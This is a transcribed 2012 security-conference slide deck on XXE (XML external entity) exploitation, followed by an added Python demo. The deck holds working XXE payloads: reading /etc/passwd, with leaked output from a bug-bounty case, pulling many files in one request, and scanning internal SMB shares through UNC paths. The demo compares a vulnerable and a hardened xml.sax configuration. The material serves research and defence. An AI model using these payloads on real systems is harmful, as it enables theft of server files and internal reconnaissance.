XXE advanced exploitation

  1. XXE: advanced exploitation
     DC02139, Ukraine, Kyiv, 23/03/2012

  2. XXE basics
     • Parser bug (feature)
     • To read local files
     • To cause DoS (by reading /dev/zero in a loop)

     <?xml version="1.0" encoding="utf-8"?>
     <!DOCTYPE a [<!ENTITY e SYSTEM "/etc/passwd">]>
     <a>&e;</a>

  3. Example (Yandex pwn3d for $5000)
     The SOAP service rejects the injected value as an unknown language and echoes it, i.e. the expanded entity, in the fault detail:

     $ ./xxe-direct.pl
     <?xml version="1.0" encoding="UTF-8"?>
     <SOAP-ENV:Envelope
         xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
         xmlns:namesp2="http://namespaces.soaplite.com/perl"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
         xmlns:namesp84="http://xml.apache.org/xml-soap"
         xmlns:xsd="http://www.w3.org/2001/XMLSchema"
         SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
       <SOAP-ENV:Body>
         <SOAP-ENV:Fault>
           <faultcode xsi:type="xsd:string">SOAP-ENV:511</faultcode>
           <faultstring xsi:type="xsd:string">Unknown language</faultstring>
           <detail xsi:type="xsd:string">Unknown language root:x:0:0:root:/root:/bin/bash
     daemon:x:1:1:daemon:/usr/sbin:/bin/sh
     bin:x:2:2:bin:/bin:/bin/sh
     sys:x:3:3:sys:/dev:/bin/sh
     sync:x:4:65534:sync:/bin:/bin/sync
     games:x:5:60:games:/usr/games:/bin/sh
     man:x:6:12:man:/var/cache/man:/bin/sh
     ...

  4. Exploitation trick #1. More than one file
     Reading more than one file per request: declare one external entity per file and reference them all from a single wrapper entity, so the one reflected field carries every file.

     my $requestbody = qq{<?xml version="1.0"?>
     <!DOCTYPE SOAP-ENV [
     <!ENTITY a0 SYSTEM "/etc/hostname">
     <!ENTITY a1 SYSTEM "/proc/1/status">
     <!ENTITY a2 SYSTEM "/proc/2/status">
     <!ENTITY a3 SYSTEM "/proc/3/status">
     ...
     <!ENTITY asd "===beg1n===\n&a0;\n\n&a1;\n\n&a2;\n\n&a3;===3nd===">
     ]>
     <SOAP-ENV:Header>
       <locale>&asd;</locale>
     </SOAP-ENV:Header>};

  5. Exploitation trick #2. More protocols

  6. Exploitation trick #3. SSRF

  7. Exploitation trick #3. SSRF. Practice
     Dirbust via XXE and RCE =)

  8. Exploitation trick #4. Wrappers

  9. Exploitation trick #4. Wrappers

  10. Exploitation trick #5. Win filenames

  11. Exploitation trick #6. Win networks
     Scanning the internal network for MS shares. Each UNC reference makes the parser host try to open an SMB connection to that address, so the result of each request tells you which hosts expose the share:

     <!DOCTYPE scan [
     <!ENTITY test-1 SYSTEM "\\10.0.0.1\C$\admins.txt">
     <!ENTITY test-2 SYSTEM "\\10.0.0.2\C$\admins.txt">
     ...
     <!ENTITY test-N SYSTEM "\\10.0.0.N\C$\admins.txt">
     ]>
     <scan>&test-1;</scan>

  12. Exploitation trick #7. Blind XXE?
     Reading a local XML file (without parser errors in the output) via attribute brute force:

     <!DOCTYPE scan SYSTEM "../WEB-INF/web.xml" [ ... ]>

     PoC only:
     a) XML(attacker) + XML(local) = XML(out)
     b) XSD(attacker) + XML(local) = XML(out)
     c) ........
     d) ........

  13. Exploitation trick #8. Not only web
     • 3rd-party applications
     • Browsers (local file reading in Safari, 2010)
     • Another one
     • …
     • Take a Chrome reward now ;)

  14. ???
     Ukraine, Kyiv, 23/03/2012
     @d0znpp
     d0znpp@onsec.ru
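Added example, not from the slides or from d0znpp's xxe-direct.pl: the slide-2 external-entity read and the slide-4 "more than one file per request" trick, reproduced in Python against the standard-library xml.sax parser so the behaviour can be checked locally. The parser is run twice over the same request body, once with external general entities enabled (the vulnerable configuration, feature_external_ges=True) and once with them disabled (the hardened configuration, which is also the default in supported Python releases). The target files, their contents, the temp paths and the <locale> field are all constructed for the demo.

```python
# Added example: not from d0znpp's slides or xxe-direct.pl. Reproduces the
# slide-2 external-entity read and the slide-4 "many files in one request"
# trick against Python's xml.sax, with the parser in a vulnerable and in a
# hardened configuration. File names, contents, temp paths and the <locale>
# field are constructed for the demo.
import io
import os
import shutil
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


def build_payload(paths):
    """Slide-4 style body: one external entity per file, all referenced from a
    single wrapper entity (&asd;) between markers, so a server that reflects
    just one field (here <locale>) leaks every file in one response."""
    decls = "\n".join(f'<!ENTITY a{i} SYSTEM "{p}">' for i, p in enumerate(paths))
    refs = "\n\n".join(f"&a{i};" for i in range(len(paths)))
    parts = [
        '<?xml version="1.0"?>',
        "<!DOCTYPE SOAP-ENV [",
        decls,
        f'<!ENTITY asd "===beg1n===\n{refs}\n===3nd===">',
        "]>",
        '<SOAP-ENV:Header xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">',
        "<locale>&asd;</locale>",
        "</SOAP-ENV:Header>",
    ]
    return "\n".join(parts)


class LocaleCollector(ContentHandler):
    """Collects the character data inside <locale>, the field the slide-3
    server echoes back in its SOAP fault."""

    def __init__(self):
        super().__init__()
        self.inside = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "locale":
            self.inside = True

    def endElement(self, name):
        if name == "locale":
            self.inside = False

    def characters(self, content):
        if self.inside:
            self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def parse_locale(payload, resolve_external_entities):
    """Parse the request body and return the expanded <locale> text.
    True mirrors a parser left with external general entities enabled (the
    XXE bug); False is the hardened setting, under which xml.sax expands each
    external entity to the empty string instead of opening the file."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = LocaleCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(payload.encode("utf-8")))
    return handler.text()


def demo():
    """Create two constructed stand-ins for /etc/hostname and /proc/1/status,
    then parse the same payload with both parser configurations.
    Returns (leaked_text, hardened_text)."""
    workdir = tempfile.mkdtemp()
    try:
        files = {
            "hostname": "db-internal-01\n",
            "status": "Name:\tjava\nPid:\t1\n",
        }
        paths = []
        for name, content in files.items():
            path = os.path.join(workdir, name)
            with open(path, "w") as fh:
                fh.write(content)
            paths.append(path)
        payload = build_payload(paths)
        leaked = parse_locale(payload, resolve_external_entities=True)
        hardened = parse_locale(payload, resolve_external_entities=False)
        return leaked, hardened
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    leaked, hardened = demo()
    print("--- vulnerable parser (external entities on) ---")
    print(leaked)
    print("--- hardened parser (external entities off) ---")
    print(hardened)
```

Run it as a script to see both results: with external entities enabled the markers wrap the contents of every file named in the DOCTYPE, exactly as on slide 4; with them disabled the markers survive but each entity expands to nothing, which is the behaviour to require from any parser that handles untrusted XML (for lxml the equivalent is XMLParser(resolve_entities=False)).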